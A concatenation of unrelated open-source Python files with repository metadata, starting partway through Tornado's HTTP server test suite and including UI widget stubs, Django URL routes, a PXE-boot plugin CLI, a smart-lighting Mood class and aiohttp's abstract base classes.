self.fetch_json("/", headers=https_scheme)["remote_protocol"], "https") https_forwarded = {"X-Forwarded-Proto": "https"} self.assertEqual( self.fetch_json("/", headers=https_forwarded)["remote_protocol"], "https") bad_forwarded = {"X-Forwarded-Proto": "unknown"} self.assertEqual( self.fetch_json("/", headers=bad_forwarded)["remote_protocol"], "http") class SSLXHeaderTest(AsyncHTTPSTestCase, HandlerBaseTestCase): def get_app(self): return Application([('/', XHeaderTest.Handler)]) def get_httpserver_options(self): output = super(SSLXHeaderTest, self).get_httpserver_options() output['xheaders'] = True return output def test_request_without_xprotocol(self): self.assertEqual(self.fetch_json("/")["remote_protocol"], "https") http_scheme = {"X-Scheme": "http"} self.assertEqual( self.fetch_json("/", headers=http_scheme)["remote_protocol"], "http") bad_scheme = {"X-Scheme": "unknown"} self.assertEqual( self.fetch_json("/", headers=bad_scheme)["remote_protocol"], "https") class ManualProtocolTest(HandlerBaseTestCase): class Handler(RequestHandler): def get(self): self.write(dict(protocol=self.request.protocol)) def get_httpserver_options(self): return dict(protocol='https') def test_manual_protocol(self): self.assertEqual(self.fetch_json('/')['protocol'], 'https') @unittest.skipIf(not hasattr(socket, 'AF_UNIX') or sys.platform == 'cygwin', "unix sockets not supported on this platform") class UnixSocketTest(AsyncTestCase): """HTTPServers can listen on Unix sockets 
too. Why would you want to do this? Nginx can proxy to backends listening on unix sockets, for one thing (and managing a namespace for unix sockets can be easier than managing a bunch of TCP port numbers). Unfortunately, there's no way to specify a unix socket in a url for an HTTP client, so we have to test this by hand. """ def setUp(self): super(UnixSocketTest, self).setUp() self.tmpdir = tempfile.mkdtemp() self.sockfile = os.path.join(self.tmpdir, "test.sock") sock = netutil.bind_unix_socket(self.sockfile) app = Application([("/hello", HelloWorldRequestHandler)]) self.server = HTTPServer(app, io_loop=self.io_loop) self.server.add_socket(sock) self.stream = IOStream(socket.socket(socket.AF_UNIX), io_loop=self.io_loop) self.stream.connect(self.sockfile, self.stop) self.wait() def tearDown(self): self.stream.close() self.server.stop() shutil.rmtree(self.tmpdir) super(UnixSocketTest, self).tearDown() def test_unix_socket(self): self.stream.write(b"GET /hello HTTP/1.0\r\n\r\n") self.stream.read_until(b"\r\n", self.stop) response = self.wait() self.assertEqual(response, b"HTTP/1.1 200 OK\r\n") self.stream.read_until(b"\r\n\r\n", self.stop) headers = HTTPHeaders.parse(self.wait().decode('latin1')) self.stream.read_bytes(int(headers["Content-Length"]), self.stop) body = self.wait() self.assertEqual(body, b"Hello world") def test_unix_socket_bad_request(self): # Unix sockets don't have remote addresses so they just return an # empty string. with ExpectLog(gen_log, "Malformed HTTP message from"): self.stream.write(b"garbage\r\n\r\n") self.stream.read_until_close(self.stop) response = self.wait() self.assertEqual(response, b"") class KeepAliveTest(AsyncHTTPTestCase): """Tests various scenarios for HTTP 1.1 keep-alive support. These tests don't use AsyncHTTPClient because we want to control connection reuse and closing. """ def get_app(self): class HelloHandler(RequestHandler): def get(self): self.finish('Hello world') def post(self): self.finish('Hello world') class LargeHandler(RequestHandler): def get(self): # 512KB should be bigger than the socket buffers so it will # be written out in chunks. self.write(''.join(chr(i % 256) * 1024 for i in range(512))) class FinishOnCloseHandler(RequestHandler): @asynchronous def get(self): self.flush() def on_connection_close(self): # This is not very realistic, but finishing the request # from the close callback has the right timing to mimic # some errors seen in the wild. self.finish('closed') return Application([('/', HelloHandler), ('/large', LargeHandler), ('/finish_on_close', FinishOnCloseHandler)]) def setUp(self): super(KeepAliveTest, self).setUp() self.http_version = b'HTTP/1.1' def tearDown(self): # We just closed the client side of the socket; let the IOLoop run # once to make sure the server side got the message. 
self.io_loop.add_timeout(datetime.timedelta(seconds=0.001), self.stop) self.wait() if hasattr(self, 'stream'): self.stream.close() super(KeepAliveTest, self).tearDown() # The next few methods are a crude manual http client def connect(self): self.stream = IOStream(socket.socket(), io_loop=self.io_loop) self.stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() def read_headers(self): self.stream.read_until(b'\r\n', self.stop) first_line = self.wait() self.assertTrue(first_line.startswith(b'HTTP/1.1 200'), first_line) self.stream.read_until(b'\r\n\r\n', self.stop) header_bytes = self.wait() headers = HTTPHeaders.parse(header_bytes.decode('latin1')) return headers def read_response(self): self.headers = self.read_headers() self.stream.read_bytes(int(self.headers['Content-Length']), self.stop) body = self.wait() self.assertEqual(b'Hello world', body) def close(self): self.stream.close() del self.stream def test_two_requests(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\n') self.read_response() self.stream.write(b'GET / HTTP/1.1\r\n\r\n') self.read_response() self.close() def test_request_close(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\nConnection: close\r\n\r\n') self.read_response() self.stream.read_until_close(callback=self.stop) data = self.wait() self.assertTrue(not data) self.close() # keepalive is supported for http 1.0 too, but it's opt-in def test_http10(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\n\r\n') self.read_response() self.stream.read_until_close(callback=self.stop) data = self.wait() self.assertTrue(not data) self.assertTrue('Connection' not in self.headers) self.close() def test_http10_keepalive(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() def test_http10_keepalive_extra_crlf(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() def test_pipelined_requests(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\nGET / HTTP/1.1\r\n\r\n') self.read_response() self.read_response() self.close() def test_pipelined_cancel(self): self.connect() self.stream.write(b'GET / HTTP/1.1\r\n\r\nGET / HTTP/1.1\r\n\r\n') # only read once self.read_response() self.close() def test_cancel_during_download(self): self.connect() self.stream.write(b'GET /large HTTP/1.1\r\n\r\n') self.read_headers() self.stream.read_bytes(1024, self.stop) self.wait() self.close() def test_finish_while_closed(self): self.connect() self.stream.write(b'GET /finish_on_close HTTP/1.1\r\n\r\n') self.read_headers() self.close() def test_keepalive_chunked(self): self.http_version = b'HTTP/1.0' self.connect() self.stream.write(b'POST / HTTP/1.0\r\nConnection: keep-alive\r\n' b'Transfer-Encoding: chunked\r\n' b'\r\n0\r\n') self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.stream.write(b'GET / HTTP/1.0\r\nConnection: keep-alive\r\n\r\n') 
self.read_response() self.assertEqual(self.headers['Connection'], 'Keep-Alive') self.close() class GzipBaseTest(object): def get_app(self): return Application([('/', EchoHandler)]) def post_gzip(self, body): bytesio = BytesIO() gzip_file = gzip.GzipFile(mode='w', fileobj=bytesio) gzip_file.write(utf8(body)) gzip_file.close() compressed_body = bytesio.getvalue() return self.fetch('/', method='POST', body=compressed_body, headers={'Content-Encoding': 'gzip'}) def test_uncompressed(self): response = self.fetch('/', method='POST', body='foo=bar') self.assertEquals(json_decode(response.body), {u'foo': [u'bar']}) class GzipTest(GzipBaseTest, AsyncHTTPTestCase): def get_httpserver_options(self): return dict(decompress_request=True) def test_gzip(self): response = self.post_gzip('foo=bar') self.assertEquals(json_decode(response.body), {u'foo': [u'bar']}) class GzipUnsupportedTest(GzipBaseTest, AsyncHTTPTestCase): def test_gzip_unsupported(self): # Gzip support is opt-in; without it the server fails to parse # the body (but parsing form bodies is currently just a log message, # not a fatal error). with ExpectLog(gen_log, "Unsupported Content-Encoding"): response = self.post_gzip('foo=bar') self.assertEquals(json_decode(response.body), {}) class StreamingChunkSizeTest(AsyncHTTPTestCase): # 50 characters long, and repetitive so it can be compressed. BODY = b'01234567890123456789012345678901234567890123456789' CHUNK_SIZE = 16 def get_http_client(self): # body_producer doesn't work on curl_httpclient, so override the # configured AsyncHTTPClient implementation. return SimpleAsyncHTTPClient(io_loop=self.io_loop) def get_httpserver_options(self): return dict(chunk_size=self.CHUNK_SIZE, decompress_request=True) class MessageDelegate(HTTPMessageDelegate): def __init__(self, connection): self.connection = connection def headers_received(self, start_line, headers): self.chunk_lengths = [] def data_received(self, chunk): self.chunk_lengths.append(len(chunk)) def finish(self): response_body = utf8(json_encode(self.chunk_lengths)) self.connection.write_headers( ResponseStartLine('HTTP/1.1', 200, 'OK'), HTTPHeaders({'Content-Length': str(len(response_body))})) self.connection.write(response_body) self.connection.finish() def get_app(self): class App(HTTPServerConnectionDelegate): def start_request(self, server_conn, request_conn): return StreamingChunkSizeTest.MessageDelegate(request_conn) return App() def fetch_chunk_sizes(self, **kwargs): response = self.fetch('/', method='POST', **kwargs) response.rethrow() chunks = json_decode(response.body) self.assertEqual(len(self.BODY), sum(chunks)) for chunk_size in chunks: self.assertLessEqual(chunk_size, self.CHUNK_SIZE, 'oversized chunk: ' + str(chunks)) self.assertGreater(chunk_size, 0, 'empty chunk: ' + str(chunks)) return chunks def compress(self, body): bytesio = BytesIO() gzfile = gzip.GzipFile(mode='w', fileobj=bytesio) gzfile.write(body) gzfile.close() compressed = bytesio.getvalue() if len(compressed) >= len(body): raise Exception("body did not shrink when compressed") return compressed def test_regular_body(self): chunks = self.fetch_chunk_sizes(body=self.BODY) # Without compression we know exactly what to expect. self.assertEqual([16, 16, 16, 2], chunks) def test_compressed_body(self): self.fetch_chunk_sizes(body=self.compress(self.BODY), headers={'Content-Encoding': 'gzip'}) # Compression creates irregular boundaries so the assertions # in fetch_chunk_sizes are as specific as we can get. 
def test_chunked_body(self): def body_producer(write): write(self.BODY[:20]) write(self.BODY[20:]) chunks = self.fetch_chunk_sizes(body_producer=body_producer) # HTTP chunk boundaries translate to application-visible breaks self.assertEqual([16, 4, 16, 14], chunks) def test_chunked_compressed(self): compressed = self.compress(self.BODY) self.assertGreater(len(compressed), 20) def body_producer(write): write(compressed[:20]) write(compressed[20:]) self.fetch_chunk_sizes(body_producer=body_producer, headers={'Content-Encoding': 'gzip'}) class MaxHeaderSizeTest(AsyncHTTPTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler)]) def get_httpserver_options(self): return dict(max_header_size=1024) def test_small_headers(self): response = self.fetch("/", headers={'X-Filler': 'a' * 100}) response.rethrow() self.assertEqual(response.body, b"Hello world") def test_large_headers(self): with ExpectLog(gen_log, "Unsatisfiable read", required=False): response = self.fetch("/", headers={'X-Filler': 'a' * 1000}) # 431 is "Request Header Fields Too Large", defined in RFC # 6585. However, many implementations just close the # connection in this case, resulting in a 599. self.assertIn(response.code, (431, 599)) @skipOnTravis class IdleTimeoutTest(AsyncHTTPTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler)]) def get_httpserver_options(self): return dict(idle_connection_timeout=0.1) def setUp(self): super(IdleTimeoutTest, self).setUp() self.streams = [] def tearDown(self): super(IdleTimeoutTest, self).tearDown() for stream in self.streams: stream.close() def connect(self): stream = IOStream(socket.socket()) stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() self.streams.append(stream) return stream def test_unused_connection(self): stream = self.connect() stream.set_close_callback(self.stop) self.wait() def test_idle_after_use(self): stream = self.connect() stream.set_close_callback(lambda: self.stop("closed")) # Use the connection twice to make sure keep-alives are working for i in range(2): stream.write(b"GET / HTTP/1.1\r\n\r\n") stream.read_until(b"\r\n\r\n", self.stop) self.wait() stream.read_bytes(11, self.stop) data = self.wait() self.assertEqual(data, b"Hello world") # Now let the timeout trigger and close the connection. data = self.wait() self.assertEqual(data, "closed") class BodyLimitsTest(AsyncHTTPTestCase): def get_app(self): class BufferedHandler(RequestHandler): def put(self): self.write(str(len(self.request.body))) @stream_request_body class StreamingHandler(RequestHandler): def initialize(self): self.bytes_read = 0 def prepare(self): if 'expected_size' in self.request.arguments: self.request.connection.set_max_body_size( int(self.get_argument('expected_size'))) if 'body_timeout' in self.request.arguments: self.request.connection.set_body_timeout( float(self.get_argument('body_timeout'))) def data_received(self, data): self.bytes_read += len(data) def put(self): self.write(str(self.bytes_read)) return Application([('/buffered', BufferedHandler), ('/streaming', StreamingHandler)]) def get_httpserver_options(self): return dict(body_timeout=3600, max_body_size=4096) def get_http_client(self): # body_producer doesn't work on curl_httpclient, so override the # configured AsyncHTTPClient implementation. 
return SimpleAsyncHTTPClient(io_loop=self.io_loop) def test_small_body(self): response = self.fetch('/buffered', method='PUT', body=b'a' * 4096) self.assertEqual(response.body, b'4096') response = self.fetch('/streaming', method='PUT', body=b'a' * 4096) self.assertEqual(response.body, b'4096') def test_large_body_buffered(self): with ExpectLog(gen_log, '.*Content-Length too long'): response = self.fetch('/buffered', method='PUT', body=b'a' * 10240) self.assertEqual(response.code, 599) def test_large_body_buffered_chunked(self): with ExpectLog(gen_log, '.*chunked body too large'): response = self.fetch('/buffered', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.code, 599) def test_large_body_streaming(self): with ExpectLog(gen_log, '.*Content-Length too long'): response = self.fetch('/streaming', method='PUT', body=b'a' * 10240) self.assertEqual(response.code, 599) def test_large_body_streaming_chunked(self): with ExpectLog(gen_log, '.*chunked body too large'): response = self.fetch('/streaming', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.code, 599) def test_large_body_streaming_override(self): response = self.fetch('/streaming?expected_size=10240', method='PUT', body=b'a' * 10240) self.assertEqual(response.body, b'10240') def test_large_body_streaming_chunked_override(self): response = self.fetch('/streaming?expected_size=10240', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.body, b'10240') @gen_test def test_timeout(self): stream = IOStream(socket.socket()) try: yield stream.connect(('127.0.0.1', self.get_http_port())) # Use a raw stream because AsyncHTTPClient won't let us read a # response without finishing a body. stream.write(b'PUT /streaming?body_timeout=0.1 HTTP/1.0\r\n' b'Content-Length: 42\r\n\r\n') with ExpectLog(gen_log, 'Timeout reading body'): response = yield stream.read_until_close() self.assertEqual(response, b'') finally: stream.close() @gen_test def test_body_size_override_reset(self): # The max_body_size override is reset between requests. stream = IOStream(socket.socket()) try: yield stream.connect(('127.0.0.1', self.get_http_port())) # Use a raw stream so we can make sure it's all on one connection. stream.write(b'PUT /streaming?expected_size=10240 HTTP/1.1\r\n' b'Content-Length: 10240\r\n\r\n') stream.write(b'a' * 10240) headers, response = yield gen.Task(read_stream_body, stream) self.assertEqual(response, b'10240') # Without the ?expected_size parameter, we get the old default value stream.write(b'PUT /streaming HTTP/1.1\r\n' b'Content-Length: 10240\r\n\r\n') with ExpectLog(gen_log, '.*Content-Length too long'): data = yield stream.read_until_close() self.assertEqual(data, b'') finally: stream.close() class LegacyInterfaceTest(AsyncHTTPTestCase): def get_app(self): # The old request_callback interface does not implement the # delegate interface, and writes its response via request.write # instead of request.connection.write_headers. def handle_request(request): self.http1 = request.version.startswith("HTTP/1.") if not self.http1: # This test will be skipped if we're using HTTP/2, # so just close it out cleanly using the modern interface. 
request.connection.write_headers( ResponseStartLine('', 200, 'OK'), HTTPHeaders()) request.connection.finish() return message = b"Hello world" request.write(utf8("HTTP/1.1 200 OK\r\n" "Content-Length: %d\r\n\r\n" % len(message))) request.write(message) request.finish() return handle_request def test_legacy_interface(self): response = self.fetch('/') if not self.http1: self.skipTest("requires HTTP/1.x") self.assertEqual(response.body, b"Hello world")
mr-ping/tornado
tornado/test/httpserver_test.py
Python
apache-2.0
41,934
0.000501
import sys # widgets class Button: """ Represents button Keyword arguments: text -- button text | str onclick -- function invoked after pressing the button | function: Button -> void Attributes: wide -- makes the button wide """ def __new__(cls, text=None, onclick=None): return object.__new__(sys.modules['aui.widgets'].Button) def __init__(self, text, onclick=None): self.wide = self def destroy(self): """Destroys the button""" pass class Checkbox: """ Represents checkbox in UI Keyword arguments: text -- checkbox text | str selected -- whether the checkbox is selected on init | boolean onchange -- function invoked after toggling the checkbox | function: Checkbox -> void """ def __new__(cls, text=None, selected=False, onchange=None, *args): return object.__new__(sys.modules['aui.widgets'].Checkbox) def __init__(self, text, selected=False, onchange=None): pass def destroy(self): """Destroys the checkbox""" pass class Input: """ Represents input field in UI Keyword arguments: value -- default value | str (default: "") onenter -- function called after the return key is pressed | function: Input -> void Attributes: wide -- makes the input wide """ def __new__(cls, value="", onenter=None, *args): return object.__new__(sys.modules['aui.widgets'].Input) def __init__(self, value="", onenter=None): self.wide = self def destroy(self): """Destroys the input field""" pass class Label: """ Represents label in UI Keyword arguments: text -- label text | str """ def __new__(cls, text=None, *args): return object.__new__(sys.modules['aui.widgets'].Label) def __init__(self, text): pass def destroy(self): """Destroys the label""" pass class Text: """ Represents multiline input field in UI Keyword arguments: text -- widget text | str (default: "") """ def __new__(cls, text=None, *args): return object.__new__(sys.modules['aui.widgets'].Text) def __init__(self, text=""): pass def destroy(self): """Destroys the text field""" pass # containers class Vertical: """ Represents vertical container in UI Arguments: *children -- children elements of the container """ def __new__(cls, *args): return object.__new__(sys.modules['aui.widgets'].Vertical) def append(self, child): """ Appends widget to the vertical container Keyword arguments: child -- the widget to be placed into the container """ pass def create(self, parent, align=None): """ Creates vertical container and assigns it to its parent Keyword arguments: parent -- parent of the element to be put into align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT) """ pass def destroy(self): """Destroys the vertical container""" pass class Horizontal: """ Represents horizontal container in UI Arguments: *children -- children elements of the container """ def __new__(cls, *args): return object.__new__(sys.modules['aui.widgets'].Horizontal) def append(self, child): """ Appends widget to the horizontal container Keyword arguments: child -- the widget to be placed into the container """ pass def create(self, parent, align=None): """ Creates horizontal container and assigns it to its parent Keyword arguments: parent -- parent of the element to be put into align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT) """ pass def destroy(self): """Destroys the horizontal container""" pass
klausweiss/python-aui
aui/widgets.py
Python
bsd-2-clause
4,207
0.000475
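A small composition sketch for the widget stubs documented above. The constructor signatures come straight from aui/widgets.py; the callback body, the labels, and the idea that the real backend later attaches the tree to a window via create(parent, align) are assumptions.

from aui.widgets import Button, Checkbox, Horizontal, Input, Label, Vertical

def on_submit(button):
    # Button callbacks receive the Button instance, per the docstring above.
    print("OK pressed")

form = Vertical(
    Label("Name"),
    Input(value="", onenter=None),
    Checkbox("Remember me", selected=True),
    Horizontal(
        Button("OK", onclick=on_submit),
        Button("Cancel", onclick=lambda b: form.destroy()),
    ),
)
# The real implementation would call form.create(parent) with whatever
# top-level widget it provides; 'parent' is not defined by the stubs.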
#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2011 ~ 2012 Deepin, Inc. # 2011 ~ 2012 Wang Yong # # Author: Wang Yong <lazycat.manatee@gmail.com> # Maintainer: Wang Yong <lazycat.manatee@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import gtk import gobject from cache_pixbuf import CachePixbuf from draw import draw_pixbuf class CycleStrip(gtk.HBox): ''' CycleStrip class. This widget use for cycle drawing background, but use CachePixbuf to accelerate render. @undocumented: expose_cycle_strip ''' def __init__(self, background_dpixbuf): ''' Initialize CycleStrip class. @param background_dpixbuf: DynamicPixbuf background. ''' gtk.HBox.__init__(self) self.background_dpixbuf = background_dpixbuf self.cache_pixbuf = CachePixbuf() self.set_size_request(-1, self.background_dpixbuf.get_pixbuf().get_height()) self.connect("expose-event", self.expose_cycle_strip) def expose_cycle_strip(self, widget, event): # Init. cr = widget.window.cairo_create() rect = widget.allocation background_pixbuf = self.background_dpixbuf.get_pixbuf() self.cache_pixbuf.scale( background_pixbuf, rect.width, rect.height) draw_pixbuf( cr, self.cache_pixbuf.get_cache(), rect.x, rect.y) return False gobject.type_register(CycleStrip)
linuxdeepin/deepin-ui
dtk/ui/cycle_strip.py
Python
gpl-3.0
2,087
0.001917
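A usage sketch for CycleStrip above. The DynamicPixbuf argument is obtained here through deepin-ui's theme helper, which is an assumption about the surrounding toolkit (any object exposing get_pixbuf() like a DynamicPixbuf would do), and "frame.png" is a hypothetical image name.

import gtk
from dtk.ui.theme import ui_theme
from dtk.ui.cycle_strip import CycleStrip

window = gtk.Window(gtk.WINDOW_TOPLEVEL)
strip = CycleStrip(ui_theme.get_pixbuf("frame.png"))
window.add(strip)
window.show_all()
gtk.main()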
from django.conf.urls.defaults import * from .views import * urlpatterns = patterns('', url(r'^signup/$', view=SignupLoginView.as_view( featured_form_mixin_class=SignupMultipleFormMixin), name='accounts_signup' ), url(r'^login/$', view=SignupLoginView.as_view( featured_form_mixin_class=LoginMultipleFormMixin), name='accounts_login' ), url(r'^signup-login/$', view=SignupLoginView.as_view(), name='accounts_signup_login' ), url(r'^iframes/signup/$', view=SignupLoginIframeView.as_view( featured_form_mixin_class=SignupIframeMultipleFormMixin), name='accounts_signup_iframe' ), url(r'^iframes/login/$', view=SignupLoginIframeView.as_view( featured_form_mixin_class=LoginIframeMultipleFormMixin), name='accounts_login_iframe' ), url(r'^iframes/signup-login/$', view=SignupLoginIframeView.as_view(), name='accounts_signup_login_iframe' ), url(r'^iframes/signup-login/success/$', view=SignupLoginSuccessIframeView.as_view(), name='accounts_signup_login_success_iframe' ), url(r'^logout/$', view=LogoutView.as_view(), name='accounts_logout' ), )
mfogel/django-signup-login
signup_login/urls.py
Python
bsd-3-clause
1,287
0.006993
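A minimal sketch of resolving the named routes above with Django's reverse(); it assumes this urls.py is included at the project root with no prefix, and uses the era-appropriate import path that matches django.conf.urls.defaults above.

from django.core.urlresolvers import reverse

assert reverse('accounts_signup') == '/signup/'
assert reverse('accounts_login_iframe') == '/iframes/login/'
assert reverse('accounts_signup_login_success_iframe') == '/iframes/signup-login/success/'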
# import the ERPXE core API import core # Global variables TFTPBOOT_DIR = "/tftpboot" PLUGINS_DIR = TFTPBOOT_DIR + "/er/plugins" # try to Load configuration from file system or use defaults def load_configuration(): # try to fetch configuration from file try: config = core.get_configuration() except: print "error loading " load_configuration() # parse CLI arguments def cli(arguments): verbose = arguments['--verbose'] if arguments['list']: show_plugins() elif arguments['status']: print_status() elif arguments['render']: generate_menu() elif arguments['enable']: plugin = arguments['<plugin>'] enable(plugin) elif arguments['disable']: plugin = arguments['<plugin>'] disable(plugin) def print_status(): import os.path # print some pre-status header print "ERPXE v2.0" # test folders print "TFTPBOOT path: " + TFTPBOOT_DIR if os.path.isdir(TFTPBOOT_DIR): print "directory found." print "Plugins path: " + PLUGINS_DIR if os.path.isdir(PLUGINS_DIR): print "directory found." def show_plugins(): plugins = core.get_plugins_list(PLUGINS_DIR) if plugins: print "Installed plugins:" for plugin in plugins: if plugin['deactivated']: print plugin['name'] + " (disabled) " else: print plugin['name'] # Generate Menu files inside the TFTPBOOT folder. def generate_menu(): try: core.get_configuration() print("ERPXE menu rendered succesfully") except Exception, e: print str(e) print "missing configuration file. use 'erpxe create-configuration-file' command to create one from template" return core.generate_menu(TFTPBOOT_DIR, PLUGINS_DIR) def similar(PLUGIN): from difflib import SequenceMatcher plugins = core.get_plugins_list(PLUGINS_DIR) bestName = '' bestScore = 0 for plugin in plugins: score = SequenceMatcher(None, PLUGIN.lower(), plugin['name'].lower()).ratio() if score > bestScore and score > .5: bestScore = score bestName = plugin['name'] if bestScore > 0: print "maybe you meant: " + bestName + " ?" # Enable plugin def enable(PLUGIN): if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN): print "plugin not exist" return similar (PLUGIN) core.enable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN) # Disable plugin def disable(PLUGIN): if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN): print "plugin not exist" return similar (PLUGIN) core.disable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN) print "Plugin disabled"
ERPXE/erpxe
erpxe/cli.py
Python
gpl-3.0
2,519
0.030171
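The cli() entry point above consumes a docopt-style arguments mapping; this sketch drives it directly. The dict keys mirror the lookups inside cli() itself, the plugin name is purely illustrative, and the import assumes the erpxe package (and its core module) is importable.

from erpxe.cli import cli

arguments = {
    '--verbose': False,
    'list': False,
    'status': False,
    'render': False,
    'enable': True,        # equivalent to: erpxe enable <plugin>
    'disable': False,
    '<plugin>': 'clonezilla',
}
cli(arguments)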
"""URLs to run the tests.""" try: from django.urls import include except ImportError: from django.conf.urls import include from django.conf.urls import url from django.contrib import admin admin.autodiscover() urlpatterns = ( url(r'^admin/', admin.site.urls), url(r'^status', include('server_status.urls')), )
mitodl/django-server-status
server_status/tests/urls.py
Python
agpl-3.0
328
0
"""Represent a mood on the gateway.""" from .const import ROOT_MOODS from .resource import ApiResource class Mood(ApiResource): def __init__(self, raw, parent): super().__init__(raw) self._parent = parent @property def path(self): return [ROOT_MOODS, self._parent, self.id] def __repr__(self): return '<Mood {}>'.format(self.name)
r41d/pytradfri
pytradfri/mood.py
Python
mit
383
0
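A construction sketch for the Mood resource above. The raw-dict keys ('9001' for the name, '9003' for the instance id) and the numeric group id passed as parent are assumptions about what ApiResource and the gateway exchange; only Mood(raw, parent), .path and __repr__ come from the code itself.

from pytradfri.mood import Mood

raw = {'9001': 'RELAX', '9003': 196608}   # key meanings are assumptions
mood = Mood(raw, parent=131073)
print(mood)       # <Mood RELAX>, via the __repr__ defined above
print(mood.path)  # [ROOT_MOODS, 131073, 196608]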
import asyncio import sys from abc import ABC, abstractmethod from collections.abc import Iterable, Sized PY_35 = sys.version_info >= (3, 5) class AbstractRouter(ABC): def __init__(self): self._frozen = False def post_init(self, app): """Post init stage. Not an abstract method for sake of backward compatibility, but if the router wants to be aware of the application it can override this. """ @property def frozen(self): return self._frozen def freeze(self): """Freeze router.""" self._frozen = True @asyncio.coroutine # pragma: no branch @abstractmethod def resolve(self, request): """Return MATCH_INFO for given request""" class AbstractMatchInfo(ABC): @asyncio.coroutine # pragma: no branch @abstractmethod def handler(self, request): """Execute matched request handler""" @asyncio.coroutine # pragma: no branch @abstractmethod def expect_handler(self, request): """Expect handler for 100-continue processing""" @property # pragma: no branch @abstractmethod def http_exception(self): """HTTPException instance raised on router's resolving, or None""" @abstractmethod # pragma: no branch def get_info(self): """Return a dict with additional info useful for introspection""" @property # pragma: no branch @abstractmethod def apps(self): """Stack of nested applications. Top level application is left-most element. """ @abstractmethod def add_app(self, app): """Add application to the nested apps stack.""" @abstractmethod def freeze(self): """Freeze the match info. The method is called after route resolution. After the call .add_app() is forbidden. """ class AbstractView(ABC): def __init__(self, request): self._request = request @property def request(self): return self._request @asyncio.coroutine # pragma: no branch @abstractmethod def __iter__(self): while False: # pragma: no cover yield None if PY_35: # pragma: no branch @abstractmethod def __await__(self): return # pragma: no cover class AbstractResolver(ABC): @asyncio.coroutine # pragma: no branch @abstractmethod def resolve(self, hostname): """Return IP address for given hostname""" @asyncio.coroutine # pragma: no branch @abstractmethod def close(self): """Release resolver""" class AbstractCookieJar(Sized, Iterable): def __init__(self, *, loop=None): self._loop = loop or asyncio.get_event_loop() @abstractmethod def clear(self): """Clear all cookies.""" @abstractmethod def update_cookies(self, cookies, response_url=None): """Update cookies.""" @abstractmethod def filter_cookies(self, request_url): """Return the jar's cookies filtered by their attributes.""" class AbstractPayloadWriter(ABC): @abstractmethod def write(self, chunk): """Write chunk into stream""" @asyncio.coroutine @abstractmethod def write_eof(self, chunk=b''): """Write last chunk""" @asyncio.coroutine @abstractmethod def drain(self): """Flush the write buffer."""
juliatem/aiohttp
aiohttp/abc.py
Python
apache-2.0
3,396
0
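A minimal concrete resolver against the AbstractResolver contract shown above (the old asyncio.coroutine-style interface); the hard-coded host table is illustrative only.

import asyncio

from aiohttp.abc import AbstractResolver


class StaticResolver(AbstractResolver):
    """Resolve hostnames from a fixed mapping -- handy for tests and sketches."""

    def __init__(self, table):
        self._table = table

    @asyncio.coroutine
    def resolve(self, hostname):
        # Return the pre-configured address, per the abstract docstring above.
        return self._table[hostname]

    @asyncio.coroutine
    def close(self):
        # Nothing to release for an in-memory table.
        pass


resolver = StaticResolver({'example.test': '127.0.0.1'})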
from port_range import PortRange

pr = PortRange('1027/15')
print(pr.bounds)

pr = PortRange('4242-42')
print(pr)
VRaviTheja/SDN-policy
testing/testing_portrange.py
Python
apache-2.0
112
0
